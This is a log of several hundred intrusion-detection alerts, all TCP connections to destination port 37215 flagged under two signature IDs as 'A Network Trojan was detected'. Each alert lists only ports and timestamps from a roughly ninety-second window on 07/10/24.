                  SID:2835222
                  Source Port:44552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268531
                  SID:2835222
                  Source Port:35112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.449293
                  SID:2835222
                  Source Port:44236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.611390
                  SID:2829579
                  Source Port:47086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.672613
                  SID:2829579
                  Source Port:32914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.901569
                  SID:2829579
                  Source Port:44818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.222774
                  SID:2829579
                  Source Port:35764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.565962
                  SID:2829579
                  Source Port:43422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383825
                  SID:2835222
                  Source Port:56312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.984415
                  SID:2829579
                  Source Port:54632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848073
                  SID:2829579
                  Source Port:59568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.883651
                  SID:2835222
                  Source Port:52488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917692
                  SID:2835222
                  Source Port:54280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.626210
                  SID:2829579
                  Source Port:40342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.147392
                  SID:2829579
                  Source Port:48576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.246495
                  SID:2835222
                  Source Port:52282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.437188
                  SID:2835222
                  Source Port:46246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767768
                  SID:2835222
                  Source Port:35388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.693119
                  SID:2829579
                  Source Port:55044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.606203
                  SID:2829579
                  Source Port:51982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.482822
                  SID:2835222
                  Source Port:37384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.997296
                  SID:2829579
                  Source Port:35012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.577459
                  SID:2835222
                  Source Port:46300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.408073
                  SID:2829579
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929011
                  SID:2829579
                  Source Port:57038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.788826
                  SID:2835222
                  Source Port:39578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.852238
                  SID:2829579
                  Source Port:58654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853796
                  SID:2829579
                  Source Port:47080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.719591
                  SID:2835222
                  Source Port:34822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.670364
                  SID:2835222
                  Source Port:60124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.778762
                  SID:2829579
                  Source Port:60100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.035862
                  SID:2829579
                  Source Port:47836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086358
                  SID:2829579
                  Source Port:43238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.148653
                  SID:2835222
                  Source Port:42784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.076918
                  SID:2835222
                  Source Port:41266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869789
                  SID:2829579
                  Source Port:35164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.489200
                  SID:2829579
                  Source Port:35726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.527963
                  SID:2835222
                  Source Port:43448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.000984
                  SID:2829579
                  Source Port:46784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.581630
                  SID:2829579
                  Source Port:45626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211996
                  SID:2829579
                  Source Port:37646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.029902
                  SID:2835222
                  Source Port:52336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.224533
                  SID:2829579
                  Source Port:59048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609606
                  SID:2829579
                  Source Port:37210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.528287
                  SID:2829579
                  Source Port:49434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853545
                  SID:2835222
                  Source Port:47980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.757983
                  SID:2829579
                  Source Port:33226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224904
                  SID:2835222
                  Source Port:46370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.743244
                  SID:2835222
                  Source Port:34478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.647269
                  SID:2829579
                  Source Port:49032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.827903
                  SID:2829579
                  Source Port:44724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.854499
                  SID:2835222
                  Source Port:59516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.439779
                  SID:2829579
                  Source Port:54136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.291086
                  SID:2835222
                  Source Port:35066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.280856
                  SID:2835222
                  Source Port:33586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.812084
                  SID:2829579
                  Source Port:50736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583882
                  SID:2835222
                  Source Port:51468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.838798
                  SID:2829579
                  Source Port:56674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.439490
                  SID:2835222
                  Source Port:44738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.178122
                  SID:2835222
                  Source Port:36418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.219162
                  SID:2835222
                  Source Port:52342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006056
                  SID:2829579
                  Source Port:46194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.951935
                  SID:2829579
                  Source Port:33746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.469973
                  SID:2835222
                  Source Port:53114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.419826
                  SID:2835222
                  Source Port:53752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.891273
                  SID:2829579
                  Source Port:35698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.751241
                  SID:2835222
                  Source Port:33826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.557067
                  SID:2835222
                  Source Port:50034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.243127
                  SID:2835222
                  Source Port:57582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2829579
                  Source Port:32786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.128878
                  SID:2835222
                  Source Port:36172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019292
                  SID:2835222
                  Source Port:48718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.544171
                  SID:2835222
                  Source Port:48952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.435452
                  SID:2835222
                  Source Port:48278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139663
                  SID:2835222
                  Source Port:45046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645814
                  SID:2829579
                  Source Port:60114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238024
                  SID:2829579
                  Source Port:46772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.124026
                  SID:2835222
                  Source Port:47058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.778031
                  SID:2829579
                  Source Port:52812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.819139
                  SID:2829579
                  Source Port:52770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593421
                  SID:2835222
                  Source Port:58266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.863602
                  SID:2829579
                  Source Port:43416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.027883
                  SID:2829579
                  Source Port:33546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.381447
                  SID:2835222
                  Source Port:45128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.825094
                  SID:2829579
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798195
                  SID:2829579
                  Source Port:34980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.018134
                  SID:2829579
                  Source Port:45544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.665893
                  SID:2829579
                  Source Port:39574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.427022
                  SID:2829579
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771791
                  SID:2835222
                  Source Port:38104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021968
                  SID:2835222
                  Source Port:54742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.272369
                  SID:2829579
                  Source Port:34186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.461336
                  SID:2835222
                  Source Port:47596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.199768
                  SID:2835222
                  Source Port:53066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.688834
                  SID:2829579
                  Source Port:36882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224175
                  SID:2835222
                  Source Port:41124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941431
                  SID:2829579
                  Source Port:56096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.775247
                  SID:2835222
                  Source Port:37212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870525
                  SID:2829579
                  Source Port:32918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.566830
                  SID:2829579
                  Source Port:45414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.185789
                  SID:2835222
                  Source Port:52550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.750375
                  SID:2829579
                  Source Port:35664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.845068
                  SID:2835222
                  Source Port:37020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.647956
                  SID:2829579
                  Source Port:56108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.663157
                  SID:2835222
                  Source Port:48920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.009286
                  SID:2829579
                  Source Port:47762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.731186
                  SID:2829579
                  Source Port:58690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.873718
                  SID:2835222
                  Source Port:41090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.010263
                  SID:2829579
                  Source Port:37714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.185789
                  SID:2829579
                  Source Port:47792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.992323
                  SID:2829579
                  Source Port:50848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.990374
                  SID:2835222
                  Source Port:46394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.986652
                  SID:2835222
                  Source Port:49800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996261
                  SID:2829579
                  Source Port:33768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.025929
                  SID:2835222
                  Source Port:36540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.029781
                  SID:2835222
                  Source Port:39932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.416063
                  SID:2829579
                  Source Port:46856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810529
                  SID:2829579
                  Source Port:37388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.468391
                  SID:2835222
                  Source Port:52804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.498164
                  SID:2829579
                  Source Port:45174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.184506
                  SID:2829579
                  Source Port:56992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593723
                  SID:2829579
                  Source Port:33514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.640182
                  SID:2829579
                  Source Port:34872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.214709
                  SID:2835222
                  Source Port:40904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.982789
                  SID:2835222
                  Source Port:47886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.660823
                  SID:2829579
                  Source Port:52422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.530155
                  SID:2835222
                  Source Port:47416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.831923
                  SID:2835222
                  Source Port:33260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.873303
                  SID:2835222
                  Source Port:34756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.384906
                  SID:2835222
                  Source Port:60384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571545
                  SID:2835222
                  Source Port:49972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.588243
                  SID:2835222
                  Source Port:48468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.402603
                  SID:2829579
                  Source Port:58680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.160478
                  SID:2829579
                  Source Port:46982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.746894
                  SID:2835222
                  Source Port:34200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.399244
                  SID:2829579
                  Source Port:46906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.061013
                  SID:2829579
                  Source Port:60074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428131
                  SID:2835222
                  Source Port:59928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.998271
                  SID:2835222
                  Source Port:55146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.474921
                  SID:2835222
                  Source Port:58224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.542013
                  SID:2835222
                  Source Port:53712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.593829
                  SID:2835222
                  Source Port:36186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.284059
                  SID:2829579
                  Source Port:46658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.168197
                  SID:2835222
                  Source Port:37128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.764508
                  SID:2835222
                  Source Port:55656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655824
                  SID:2829579
                  Source Port:42822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.811251
                  SID:2829579
                  Source Port:50464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.512071
                  SID:2829579
                  Source Port:33776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.234090
                  SID:2829579
                  Source Port:41152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.238531
                  SID:2835222
                  Source Port:53508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.900911
                  SID:2835222
                  Source Port:32952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.018737
                  SID:2835222
                  Source Port:39930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.939164
                  SID:2835222
                  Source Port:43628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.659846
                  SID:2835222
                  Source Port:46834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.132533
                  SID:2835222
                  Source Port:55680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161476
                  SID:2829579
                  Source Port:41906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.817300
                  SID:2829579
                  Source Port:43268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.926715
                  SID:2829579
                  Source Port:59226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.152764
                  SID:2829579
                  Source Port:40072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.093525
                  SID:2829579
                  Source Port:43872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.181617
                  SID:2829579
                  Source Port:40612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.901645
                  SID:2835222
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.910402
                  SID:2835222
                  Source Port:41302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.652584
                  SID:2829579
                  Source Port:36522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.135035
                  SID:2829579
                  Source Port:32984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.907475
                  SID:2829579
                  Source Port:37942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868019
                  SID:2835222
                  Source Port:50374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.983145
                  SID:2829579
                  Source Port:57788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.821623
                  SID:2829579
                  Source Port:47390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.901324
                  SID:2835222
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278115
                  SID:2835222
                  Source Port:56824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.388758
                  SID:2829579
                  Source Port:39204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.033866
                  SID:2829579
                  Source Port:55918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.211631
                  SID:2829579
                  Source Port:60116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.685142
                  SID:2829579
                  Source Port:44938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.591499
                  SID:2835222
                  Source Port:49494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.447281
                  SID:2829579
                  Source Port:59866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.660252
                  SID:2835222
                  Source Port:39988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.121135
                  SID:2835222
                  Source Port:58640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.621778
                  SID:2835222
                  Source Port:40364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641366
                  SID:2835222
                  Source Port:44196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.154220
                  SID:2835222
                  Source Port:59298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.825878
                  SID:2835222
                  Source Port:40952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
